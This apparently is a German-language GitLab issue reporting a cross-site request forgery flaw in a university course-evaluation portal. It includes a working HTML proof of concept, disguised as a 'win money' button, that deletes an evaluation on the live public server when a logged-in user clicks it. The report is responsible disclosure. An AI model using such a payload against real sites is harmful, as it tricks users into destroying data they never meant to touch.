evaluationsportal issueshttps://gitlab.cs.fau.de/fsi-inf/evaluationsportal/-/issues2018-07-25T18:50:26Zhttps://gitlab.cs.fau.de/fsi-inf/evaluationsportal/-/issues/107Anfällig für CSRF2018-07-25T18:50:26ZHans-Peter DeifelAnfällig für CSRF[CSRF](https://en.wikipedia.org/wiki/Cross-site_request_forgery) ist relativ trivial möglich. Z.B gegen den testserver auf Port 5000 mit folgendem HTML:
```html
<html>
<body>
<form method="POST" action="https://eva.fsi.cs.fau.de/m...[CSRF](https://en.wikipedia.org/wiki/Cross-site_request_forgery) ist relativ trivial möglich. Z.B gegen den testserver auf Port 5000 mit folgendem HTML:
```html
<html>
<body>
<form method="POST" action="https://eva.fsi.cs.fau.de/moderation/edit/ef63f8b9abb91791aaad0552b5818848/">
<input type="submit" name="delete" value="Gewinne GELD!!!" />
</form>
</body>
</html>
```
**Vorsicht**: Auf den Button klicken und eingeloggt sein löscht eine Eva vom Thorsten auf dem öffentlichen eva-server.